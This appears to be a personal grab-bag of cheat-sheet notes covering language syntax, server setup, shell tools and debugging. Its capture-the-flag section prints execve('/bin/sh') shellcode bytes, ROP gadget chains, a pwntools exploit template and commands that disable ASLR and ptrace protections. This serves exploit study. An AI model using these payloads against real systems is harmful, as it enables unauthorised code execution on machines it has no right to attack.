.collect>B>(self) → B where B: FromIterator<T>

// B is often explicitly specified (with the "turbofish")
// You can use Vec<_> (or many other collections)
// collect String from char
// collect String from String (!)
// if collect C from T, then collect Option<C> from Option<T>
// if collect C from T, then collect Result<C, E> from Result<T, E>

closures

let cap = 1;
|arg: Foo| { arg + cap }

move |arg: Foo| { arg + cap }

fn foo<F>(f: F) where F: Fn(Foo) -> Bar

stuff

pub fn notify(item: impl Summary) {
    println!("Breaking news! {}", item.summarize());
}
// is syntax sugar for
pub fn notify<T: Summary>(item: T) {
    println!("Breaking news! {}", item.summarize());
}
// is syntax sugar for
pub fn notify<T>(item: T) where T: Summary {
    println!("Breaking news! {}", item.summarize());
}

pub fn notify(item: impl Summary + Display) {
pub fn notify<T: Summary + Display>(item: T) {

fn some_function<T, U>(t: T, u: U) -> i32
    where T: Display + Clone,
          U: Clone + Debug
{ ... }

fn other_function<T>(t: T) -> i32
    where Option<T>: Debug
{ ... }

Written in a hurry for a certain Codeforces contest. There's more here than Scala because I learned Scala more slowly and systematically by actually writing a Scala project.

Variables and Types

val, var, fun. Types are postfix with colon. Unit is void and can be omitted. You've seen this before in Scala except for fun.

fun sum(a: Int, b: Int): Int {
	return a + b
}

fun sum(a: Int, b: Int): Int = a + b

You can call functions with named default arguments like f(arg = param).

Strings template with $foo like Perl or ${foo} like JavaScript template literals.

instanceof is is: obj is String. The inverse is !is. Casting is as??

Expressions

if (x in 1..5) { print(x) }. Inverse is !in. for (x in 1..5) { print(x) }, for (x in 9 downTo 9 step 3) { print(x) }. Ranges are inclusive as in Haskell.

Functions and Lambdas

Everything in braces: { arg1, arg2 -> arg1 + arg2 }. Fast single-argument anonymous functions use it: ints.filter { it != 0 }. More explicitly you can write fun(arg: T): T { return arg }.

The type of a function is (A1, A2) -> R.

Note that to use a function declared not-inline as fun foo() { ... } as a value, you write ::foo.

Nullability

T? basically means nullable T. T looks like a subtype of T?, and control flow narrows the type

a?.b is null if a is null, a.b otherwise

a ?: b (the "Elvis operator") is b if a is null, a otherwise

a!! asserts that a is not null and gets it.

a as? T casts a to T, returning null if it fails.

Unclear if this goes here, but str.toIntOrNull() is a null-safe version of str.toInt().

Classes

class Foo(bar: T, val baz: U) {
}

Stuff

ArrayList and stuff work. You can also use [] indexing.

how do you server

# these might assume Ubuntu
adduser example
adduser example sudo

# log in as example, put entry in ~/.ssh/authorized_keys
# edit /etc/ssh/sshd_config to say:
PasswordAuthentication no
sudo systemctl restart sshd

sudo vim /etc/nginx/conf.d/your.website.com.conf
sudo nginx -s reload

server {
    listen 80; # port
    listen [::]:80; # ipv6 port

    # serve static content
    root /path/to/static-content-folder;
    index index.html; # can list more than one

    location /special-static/ {
        alias /path/to/special/folder/;
    }
}
server {
    listen 443 ssl;
    listen [::]:443 ssl ipv6only=on; # ??

    # Certbot should deal with these
    ssl_certificate /path/to/fullchain.pem;
    ssl_certificate_key /path/to/privkey.pem;
    include /path/to/options-ssl-nginx.conf;
    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem;
}

location /someexactpath/ {
    proxy_pass http://localhost:12345/;
    proxy_buffering off;
}

# or location ~* ^/somepath/ { }

location /idk/ {
    proxy_pass http://localhost:12345/;
    proxy_buffering off;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "Upgrade";

    # by default nginx sets Host to $proxy_host
    proxy_set_header Host $host;
    proxy_read_timeout 7200;
}

sudo ufw app list // this does NOT mean what's allowed in lol
sudo ufw status
sudo ufw allow 8073
sudo ufw allow http
sudo ufw allow https
sudo ufw allow ssh
sudo ufw allow mosh

The opposite of allow is deny, but to undo typing one of the above you type delete and then the rule again, e.g. ufw delete allow 8073

ssh

ssh-keygen -t rsa -b 4096 -t ed25519 [-f ~/.ssh/filename] [-C [email protected]]

• show fingerprint: ssh-keygen -l [-f ~/.ssh/filename]
• regenerate public from private: ssh-keygen -y [-f ~/.ssh/filename]
• change password: ssh-keygen -p [-f ~/.ssh/filename]

View the public host key you have stored for a server: ssh-keygen -H -F hostname.example.com[:port] (the hostnames are normally hashed so you can't just list all known hostnames)

Delete it: ssh-keygen -R hostname.example.com[:port]

The server's keys might be in /etc/ssh.

ssh-copy-id -i ~/.ssh/filename user@host

ssh -i ~/.ssh/filename user@host

misc

ffmpeg -i input-video.avi -vn -acodec copy output-audio.aac # -vn is no video. -acodec copy says use the same audio stream
ffmpeg ... -filter:v crop=w:h:x:y,scale=w:h
ffmpeg -i input.mkv -filter:v "setpts=0.125*PTS" -filter:a "atempo=2.0,atempo=2.0,atempo=2.0" output.mkv

choose what to auto open something with: mimeopen somefile weird type: inode/mount-point

sudo dpkg -i foo.deb; sudo apt install -f

version: lsb_release -a

ssh [email protected] "gzip -c /home/user/bigfile" > backup-(date +%F-%T).db.gz

ssh [email protected] mysqldump --user=some_user --password=some_password --host=some_host.db --databases some_database | gzip > backup-(date +%F-%T).sql.gz

df (about file systems, used/avail %) -h human-readable powers of 1024

ls

• -l long
• -S sort by file, largest first
• -r reverse (can be combined)
• -h human-readable sizes

tar

• cf archive.tar src1.txt src2.txt: create
• xf archive.tar: extract
• xvzf archive.tar.gz: extract gzip verbosely
• cvzf archive.tar.gz src1.txt src2.txt: create gzip verbosely

find . -printf '%s\t%p\n' | sort -n or | sort -nr | head -10 du | sort -g

tr 'a-z' 'n-za-m', or tr -d ' ' to delete things.

timezones on some flavors of Linux: sudo dpkg-reconfigure tzdata

wget -r -np -k example.com

• -r = --recursive: recursive retrieving, default depth of 5
• -np = --no-parent: never ascend to parent directory, so that only files below in hierarchy will be downloaded
• -k = --convert-links: rewrite links so pages are suitable for local viewing

sudo echo foo > privileged_file does not work, try echo foo | sudo tee privileged_file or sudo sh -c 'echo foo > privileged_file'. related vim hack, if you accidentally opened a privileged file read-only and edited: :w !sudo tee %

tee takes -a/--append, analogue of >>

scp [email protected]:foobar.txt /some/local/directory
scp foobar.txt [email protected]:/some/remote/directory

scrot

• -d = --delay NUM: wait NUM seconds
  • -c = --count: display a countdown
• -u = --focused: use currently focused window
• -s = --select: window or rectangle with mouse
• -b = --border: include WM border

random debugging/file-rescuing things

df

fsck

smartctl (sudo smartctl -x /dev/something, maybe truncate n#p#?)

journalctl: queries systemd journal maybe -k -b -1. -k is kernel only. -b -1 is a number, last boots are -0, -1... and first boots are 1, 2... -e to page to end automatically; -r reverses; -f follows.

dmesg

lsblk

sudo usb-creator-gtk (gui)

grep and friends

• grep, grep -G: "basic regular expressions": ?+{}|() are literal, magic if backslashed.
• egrep, grep -E: "extended regular expressions"
• fgrep, grep -F: fixed strings

options everybody knows

• -A NUM: print NUM lines of context after
• -B NUM: print NUM lines of context before
• -C[NUM]: print NUM lines of context, default 2 (grep says there must be no space between the option and its argument! others don't)
• -i: ignore case
• -m NUM: stop reading file after NUM matches
• -o: only print the matching part of lines
• -r: recursive
• -w: search for as if a word

grep

• --color: color-highlight matches
• --exclude PAT: exclude files matching the filename pattern
• --exclude-dir PAT: exclude directories matching the filename pattern
• --include PAT: only search files matching the filename pattern
• --include-dir PAT: only search directories matching the filename pattern

ack

• -f: just list files that have been selected for searching
• -g PATTERN: print files where relative path + filename matches PATTERN
• --ignore-dir DIRNAME: ignore directories with this exact name (not a pattern!)
• --ignore-file FILTER: ignore files matching this filter
• -Q: match as literal string
• --smart-case
• --type-set=yourtypename:FILTER --yourtypename: create a custom file filter type, and use it (probably put the first part in your ~/.ackrc)
• Filters:
  • is:FILENAME matches FILENAME literally
  • ext:EXTENSION,... e.g. ext:hs or ext:c,h,cpp checks the extension
  • match:PATTERN matches filename with pattern, case-insensitively

ag

• -g PATTERN: print filenames that match
• -G PATTERN: only search filenames whose names match
• --ignore PATTERN: ignore files/directories whose names match this pattern
• -Q: match as literal string
• -S --smart-case
• -U: don't use VCS ignore files (.gitignore etc.) but still use .agignore

rg

• -g '!PATTERN': don't search filenames whose names match

sed, awk...

sed s/foo/bar/
sed s/foo/bar/g
sed 's/foo\(.\)/bar\1/g'
sed -E 's/\d/\1\1/g'
sed -n /foo/p # just grep
sed -n s/foo/bar/p # only print subbed lines

Each awk command(?) is pattern { action }. pattern could be empty to do something every line, BEGIN, END, /pattern/, expression like NF > 2. $0 is the entire line (record), $1 is the first (1-indexed) field (whitespace-separated; use -F to specify a separator, which maybe can be empty to have each character its own field), etc. Lots of C-like math ("1" + "2" == 3, but "10" < "2", use unary +), but not bitwise operators; juxtaposition is concatenation; x ~ /foo/; NF number of fields ($NF for last field, $(NF-1)...), NR is number of records (lines) (so far). Variables can be used ex nihilio; they default to "", which converts to 0.

awk '{ x += $1 } END { print x }'
awk -F ',' '/aaa/ { print $3 }' data.csv | gnuplot -p -e "plot '-'"

identify and convert (ImageMagick)

Usage

Snippet to get name, height, width in format of an HTML tag: identify -format '<img src="%f" width="%w" height="%h" />' $argv

Crop

Resize

convert dragon.gif -resize 64x64 resized_dragon.gif

This resizes the gif, preserving aspect ratio, so that it is as large as possible while fitting in a 64x64 box (one dimension = 64, the other ≤ 64). Variants (which often need to be escaped for the shell to see them):

• 64x64!: Exactly that size; don't preserve aspect ratio
• 64x64>: Only shrink
• 64x64<: Only enlarge
• 64x64^: Fill area: make it as small as possible while containing a 64x64 box (one dimension = 64, the other > 64). Corollary: 1x64^ forces a height of 64; 64x1^ forces a width of 64.
• 50% just means fifty percent

These characters are just flags that affect the entire -resize. Location doesn't matter. 50%x30 doesn't work.

shell polyglot

if ...; then
...
elif ...; then
...
else
...
fi

if ...
...
else if ...
...
else
...
end

for v in 1 2 3
do
echo $v
done

for v in 1 2 3
echo $v
end

case ... in
pattern1)
...
;;
pattern2)
...
;;
*)
...
esac

switch ...
case pattern1
...
case pattern2
...
case '*'
...
end

path manipulation

basename /path/to/foo → foo
basename /path/to/foo.cpp .cpp → foo
dirname /path/to/foo → /path/to
dirname foo → .

strftime

man date:

| date        %F = %Y-%m-%d = 2013-09-27
|             %D = %m/%d/%y = 09/27/13
|
|   year    | %Y = 2013, %C = 20, %y = 13
|   month   | %m = 09, %b = %h = Sep, %B = September
|   day     | %d = 27, %e = %_d
|   of week | %a = Fri, %A = Friday
|
|         %j = 001..366
|
| time           %T = 13:37:42
|                %r = locale's 01:11:04 PM
|   h:m        | %R = 13:37
|       hour   | %H = (00..23), %I = (01..12); %k = %_H, %l = %_I
|              |                %p = AM/PM, %P = am/pm
|       minute | %M = 37
|       second | %S = (00..60)

ISO time (more or less): %Y-%m-%dT%H:%M:%S%z = %FT%T%z

nano

^G Get help
^X close
^O (write Out): save the file
^S save with no prompt

^W ("where?"): search
^Q ("where?"): search back
^\ replace

M-A / ^6: MArk (visual mode)
M-} (or Tab): indent
M-{ (or Shift-Tab): dedent

M-^ copy line
^K (Kill): cut line
^U (Uncut): uncut line

M-U undo
M-E Redo

M-: start/stop recording macro
M-; do macro

M-# line numbers
M-P whitespace
M-Y color

sql(ite)

mongosh

• "collection" ≈ "table"
• "document" ≈ "row"

show dbs
use my_db_name
show collections

db.getCollectionNames()
// all args optional:
db.my_collection_name.find(query, projection, options)
query examples:
{ "_id": "foo" }
{ "qty": { "$gt": 4 }}
{ "qty": { "$exists": true }}

thing1 = {"foo": "bar", ...}
db.my_collection_name.insertOne(thing1)
db.my_collection_name.insertMany([thing1, ...])
db.my_collection_name.deleteMany(query)
// query = {}: DELETE EVERYTHING

python -c 'print "\x12\x34\x56\x78"*50'
edgy:
perl -e 'print "b" x 0x88, "\x12\x34\x56\x78"'

objdump -d executable
file
strings

from __future__ import division, print_function
from pwn import *
import re, sys

# context.arch = "amd64"
# context.terminal = ['tmux', 'splitw', '-h']
# sys.setrecursionlimit(8000)

if args['REMOTE']:
    conn = remote('1.2.3.4', 1337)
else:
    conn = process('executable')
    if args['GDB']:
        gdb.attach(conn, """set disassembly-flavor intel
        b __libc_start_main
        """)

maze_text = conn.recvuntil('(the lower left cell is 0,0)')

goal_res = re.search(r'goal: (\d+), (\d+)', maze_text)
goal = (int(goal_res.group(1)), int(goal_res.group(2)))

conn.sendline('foo')

conn.interactive()

x86

Registers

x86(-32) has eight registers: EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI. (x86-64 has 8 more and adds RAX etc.) Also EIP is the instruction pointer.

Stack

| ‹locals/temps›   | <= esp
| ‹locals/temps›   |    esp+8
| ‹locals/temps›   |    ...
| ‹locals/temps›   |    ebp-8
| ‹old ebp›        | <= ebp
| ‹return address› |    ebp+8
| ‹arguments?›     |    ebp+16

• ESP is the Stack Pointer, pointing to the “top” of the stack (the end with lowest address), and is important since PUSHing and POPping handles it.
• EBP is the Stack Base Pointer, somewhere “below” (higher memory) ESP on the stack, but above it, a useful baseline from which functions can access things on the stack relatively.

The stack grows "downward in memory" i.e. toward lower addresses, so if we write the stack memory by increasing memory addresses as usual, the metaphorical top of the stack coincides with the top.

Words

64(----------------RAX-----------------)
                    32(------EAX-------) (DWORD)
                              16(--AX--) (WORD)
                              8(AH)8(AL) (BYTE)

x86 is little-endian: least-significant byte first.

Calling Conventions

• x86 (32): Arguments go on stack, pushed in reverse order so their memory addresses are in order:

  push ebp
  mov  ebp, esp
  push arg2
  push arg1
  call callee
  pop ebp

• x86-64, System V/AMD64 ABI/Linux/OSX: First six integer arguments in %rdi, %rsi, %rdx, %rcx, %r8, %r9.

• x86-64, Microsoft/Windows: %rcx, %rdx, %r8, %r9

Different OS’s have different syscalls.

• call callee ≈ push eip+4; mov eip, callee
• ret ≈ pop eip
• enter ≈ push ebp; mov ebp, esp
• leave ≈ mov esp, ebp; pop ebp

reference dive

Nothing takes immediate of more than 32 bits.

Offset = base (register) + (index (register) * base(1, 2, 4 or 8)) + displacement (none to 32 bits)

Important Opcodes

Registers in order:

rax rcx rdx rbx rsp rbp rsi rdi
r8  r9  r10 r11 r12 r13 r14 r15

e8: call (4 bytes: relative address)
e9: jmp (4 bytes: relative address)
eb: jmp (1 byte: relative address)
c3: ret

For a lot of operations between two 64-bit registers, the bytecode has three bytes like so:

0b01001S0D 0bXXXX1001 0b11SSSDDD

where the four X bits control the opcode, the four S bits control the source register, the four D bits control the destination register:

01: add
09: or
11: adc
19: sbb
21: and
29: sub
31: xor
39: cmp

   31 (c0 + 8*src + dst): xor reg, reg
   31 c0: xor eax, eax
   31 c1: xor ecx, eax
   31 c8: xor eax, ecx
   31 d2: xor edx, edx
48 31 c0: xor rax, rax
4c 31 c0: xor rax, r8
49 31 c0: xor r8, rax
4d 31 c0: xor r8, r8

b8 (4 bytes): mov literal into eax
48 c7 c0 (4 bytes): mov literal into rax
49 c7 c0 (4 bytes): mov literal into r8

50-57, 41 50-57: push reg (50: push rax; 41 50: push r8)
58-5f, 41 58-5f: pop  reg (58: pop rax;  41 58: pop r8)

(16-bit mode??)

55: push bp
89 e5: mov bp, sp

ModR/M, SIB

mod r/m: 5 bits, eight registers and 24 addressing modes
reg/opcode: either register number or three more bits of opcode

Vol. 2A page 2-5.

sib byte: scale, index, base.

GDB

break __libc_start_main
break *0x12345678 // given address from radare2 or something
run

Instructions

• si/stepi (until different instruction)
• ni/nexti (until next instruction; don't enter calls)
• finish (finish this call)
• u/until location
• nextcall (pwndbg)

Source lines (rare)

• c/continue (until next breakpoint)
• s/step (until different line)
• n/next (until next line; don't enter calls)
• u/until (until numerically next line, so if you're at the end of a loop, runs until after it)

Breaking

• break label / break *0x12345678
• break label if comdition
• tbreak: as above but delete the breakpoint after broken at
• clear label / clear *0x12345789
• clear (clear breakpoint at current location)
• i b/info break (list breakpoints)
• d/delete [num] (delete nth breakpoint from i b or ALL breakpoints)
• dis/disable [num] (disable nth breakpoint or all)
• enable [num] (enable nth breakpoint or all)

Examining

• p/print expr (link):
  • Keeps history in magic variables $1, $2, etc. or in reverse order, $, $$, $$2, $$3, etc.
  • expr can be/have an assignment expression or a function call or whatever.
  • print /f expr: f = t(!), o, u/d, x/z for base 2, 8, 10 (unsigned/signed), 16 (direct/zero-padded); a for address, c for character, s for string, f for float
• x/[number][format][unit]
  • number: 10 (bytes, say)
  • format: like print /f e.g. x for hex
  • unit: b = byte, h = halfword (two bytes), w = word, g = "giant word" (eiGht bytes)
  • Keeps historical address in $_, value in $__
• x/s: string
• display/10i $eip
• set disassembly-flavor intel; disasssemble main/disas main
• find:
  • find start_addr, +len, val
  • find start_addr, end_addr, val
  • strings will include trailing \0, get around by casting {char[5]}"hello"
• i r/info registers (inspect registers; or try voltron view registers from another window)
• info functions
• info proc mappings (has heap ptr etc)
• vmmap (has heap ptr etc)

Writing

• set $esp += 4
• set {int}0x12345 = 4
• set {int}0x12345 = 4

Hacking

• j/jump location
• return [expr]
• call expr
• set write on / set write off (needs reopen file)

Watchpoint

• watch expr (break when expr is written)
• rwatch expr (break when expr is read)
• awatch expr (break when expr is read or written)

Use the same commands as breakpoints to query/delete/disable/enable: i b/info breakpoints, d/delete [num], dis/disable [num], enable [num].

There's a hardware limit on how many hardware watchpoints you can set. You can make GDB use software watchpoints with set can-use-hw-watchpoints 0 but it is very slow.

Config

• config (pwndbg tells you what you can config)
• set context-sections 'disasm' (if you're using voltron for other sections; default is 'regs disasm code stack backtrace')
• set $base = 0x555555554000

Shellcode

shell-storm.org/shellcode: Most likely you want Dad`'s 27-byte shellcode which is "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05".

from pwn import *
context.arch = "amd64"

shellcode = asm("""
    mov eax, 0x3b
    mov rdi, 0x1234567890ab ; ptr to "/bin/sh\0"
    xor rsi, rsi
    xor rdx, rdx
    syscall
""")

shellcraft.amd64.mov('rax', 0x12345678)
shellcraft.amd64.pushstr('foobar', append_null=False)

fd = 4; length = 128
shellcraft.amd64.linux.syscall('SYS_write', fd, 'rsp', length)
shellcraft.amd64.linux.syscall('SYS_read',  fd, 'rsp', length)

ROP

break somewhere
print system

Executables link against your copy of libc. execve is the most useful.

execve("/bin/sh", 0, 0)

32-bit goal

• Fill eax with syscall number, 0xb = 11
• Fill ebx with "/bin/sh"
• Fill ecx with 0
• Fill edx with 0

64-bit goal

• Fill rax with syscall number, 0x3b = 59
• Fill rdi with "/bin/sh"
• Fill rsi with 0
• Fill rdx with 0

TechSec ROP

0x080b9236 : pop eax ; ret
0x0806fd50 : pop edx ; pop ecx ; pop ebx ; ret
0x0806d905 : int 0x80

code = 'A' * 36         # 32, plus 4 for ebp
code += p32(0x080b9236) # pop eax ; ret
code += p32(0xb)        # (gets popped into eax)

0x080bc6a5 : "/bin/sh"

code = fit({36: p32(0x080b9236) + p32(0xb)}, filler='A')

Dynamic

$ ldd leakRop

$ LD_PRELOAD=/path/to/my/libc.so ./executable

(gdb) set environment LD_PRELOAD=/path/to/my/libc.so

readelf -s libc-2.19.so | grep puts@

	puts is 0005fca0

break main
info proc mappings
r < <(python payload.py)

Step through with nextcall or finish.

In 64-bit you use the standard %edi, %esi stuff. In 64-bit the instruction is actually syscall; in 32-bit it's int 0x80.

Important 64-bit Syscalls

• 0: read(uint fd, char* buf, size_t count)
• 1: write(uint fd, char* buf, size_t count)
• 2: open(const char* filename, int flags, int mode)
• 59 (0x3b): execve(const char* filename, const char *const argv, const char *const envp[])

ASLR

Randomizes:

• Shared libraries (libc)
• Heap
• Stack
• mmap
• brk
• virtual something

Check if enabled with /proc/sys/kernel/randomize_va_space (it's usually on).

PIE will additionally put the code in a random place? I think GDB turns all of these off and puts them at fixed offsets. info proc mappings is your friend and will tell you the base addresses where stuff were put. Once you've gotten an exploit working under GDB and identified a leak to the stack or libc or the one you want, do simple arithmetic translation to figure out the proper addresses.

Pwntools

enhex, unhex
concat, concat_all, findall
group(n, seq, underfull_action=['ignore'|'drop'|'fill'])
ordlist, unordlist

p8, p16, p32, p64 (  pack: int → bytes)
u8, u16, u32, u64 (unpack: bytes → int)

    You can pass endian='little'|'big', sign=False|True

more(text), yesno(text)

virtualbox shared folder because i have nowhere else to put this

sudo mount -t vboxsf -o uid=$UID,gid=$(id -g) somename ~/portal

sudo mount -t vboxsf -o uid=(id -u),gid=(id -g) somename ~/portal

radare2

Preliminaries

Install radare2, it’ll be available as r2. Load an executable prog like r2 prog. radare2 will print a random funny message on startup, sometimes it’s confusing if you’re not used to it.

[.][times][cmd][~grep][@[@iter]addr!size][|>pipe] ;

radare2 has a "current offset" displayed in the prompt, and is in the magic variable $$

Startup Commands

radare2 commands are weird strings of single letters. Start by issuing aaa or aaaa to analyze the file. More a’s is more analysis but four a’s is experimental.

Run afl to list all the functions in the program.

Disassembling and Reading Disassembly

To disassemble a function main, run pdf@main. To get the output in a pager so you can scroll with the keyboard, append ~..; here you’d run pdf@main~...

Note: If there’s a period after the bytes corresponding to an instruction, then radare2 isn’t showing you all the bytes corresponding to that instruction because, I’m not sure, it doesn’t fit in the horizontal space?

In general pd disassembles stuff, pd3@5. idk? pdf disassembles the function.

• Call graph: VV @ main
• Print Memory: px bytes; pxw 32-bit words

Patching

Might need to make the executable writable and open with r2 -w.

• Seek to a position: s 0x12345678
• Write bytes: wx ffffffff @+2. @ is your current location. 90 = NOP is your friend of course. Other types:
  • w foobar writes string
  • wa nop ; nop writes instructions
  • wz foobar writes string + \0
  • wc lists write changes
  Or wa push rax ; nop @ 0x12345678

https://github.com/radare/radare2/blob/master/doc/intro.md

Debugging/Running

r2 -d foo

• dc: continue
• dcs: continue to syscall
• dcf: continue to fork
• db: break
• ..
• eip is the current position.
• dm memory maps, which you can use to find functions exported by libraries for ropping?

other stuff

• f flag_name @ offset a flag is a bookmark
• f -flag_name delete

magic

00 00 01 00 - ICO
1F 9D - LZW zip
1F A0 - LZH zip
42 5A 68 "BZh" - Bzip2
"GIF87a", "GIF89a" - GIF
49 49 2A 00 - TIFF, little endian
4D 4D 00 2A - TIFF, big endian
FF D8 FF DB "ÿØÿÛ" - JPEG
FF D8 - other JPEG formats
50 4B [03 04] "PK.." - zip and family (jar, docx...)
52 61 72 21 "Rar!" - RAR
7F 45 4C 46 - .ELF

environment setup

function ptrace_scope_off
	echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope
end
function ptrace_scope_on
	echo 1 | sudo tee /proc/sys/kernel/yama/ptrace_scope
end
function aslr_off
	echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
end
function aslr_on
	echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
end
function hexmath
	math "obase=16;ibase=16;$argv"
end

Types

bool // true, false
uint8 uint16 uint32 uint64 uint (32 or 64)
int8 int16 int32 int64 int (32 or 64)
float32 float64
uintptr
byte = uint8
rune = int32
string

[10]int
[]byte
map[int]string // map from int to string

(channels)

type A = string // alias; they're exactly the same type
type B string   // type definition (newtype): distinct from string, but convertable
type Point struct { x, y float64 }

i := x.(int)     // type assertion (panic if fail; i is now of type int)
i, ok := x.(int) // safe type assertion (ok is false if fail)

switch i := x.(type) {
case int:
	// i is an int
case bool, string:
	// i is a bool or string
default:
	// idk
}

Literals

&Point{1, 2} is valid but e.g. &1 is not
[]T{x1, x2, ..., xn}

a := make([]T, 10) // slice of length 10
m := make(map[T]U) // empty map
append(a, t1, t2, t3) append(a, a...)

value := m[key]
value, exists := m[key]
delete(m, key)

Varargs

func F(stuff ...string)
stuff := []string{"a", "b"}
F(stuff...)

Command-Line Flags

perlrun or perldoc perlrun

Switch-clustering is OK. #!/usr/bin/env perl -flagstuvwxyz

awk note: a file contains records (usually lines), which contain fields (usually whitespace-delimited tokens)

In practice:

• perl -ne 'print if /pattern/'
• perl -pe 's/from/to/g'

A sort of mini-ack clone:

Using ack's defaults: perl -ne'print $ARGV, ":", $_ if /foo/ && /bar/' $(ack -f)

ANSI Escape

␛[0m. ␛ = chr 27 = \x1b = \033

0 can be replaced by a sequence of semicolon-separated numbers.

Not ASCII

• ಠ_ಠ
• (ノಠ益ಠ)ノ彡┻━┻
• (╯°□°）╯︵ ┻━┻
• ┬─┬ノ(ಠ_ಠノ)
• ( ͡° ͜ʖ ͡°)
• ¯\_(ツ)_/¯
• ♪~ ᕕ(ᐛ)ᕗ
• 🐉🔥
• ←↑→↓ ↔↕ ↖↗↘↙ ↶↷↺↻ (Wikipedia)
• █ ▀▄▌▐ ░▒▓ ■ ▲▶▼◀ ◆ ● ★ □ △▷▽◁ ◇ ○ ☆ ▢ ◎ (Wikipedia)

• ┌┬─┐ ├┼─┤ ││ │ └┴─┘

  ┏┳━┓ ┣╋━┫ ┃┃ ┃ ┗┻━┛

  ╔╦═╗ ╠╬═╣ ║║ ║ ╚╩═╝

• ✈✈✈ Galactic Trendsetters ✈✈✈
• Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ

UTF-8

Continuations are 0x80 to 0xbf.

* Same pattern could theoretically encode up to U+1FFFFF but is limited by RFC 3629

Bytes that should never appear: 0xc0, 0xc1 (overlong encodings); 0xf5+ (RFC) / 0xf8+ (past range)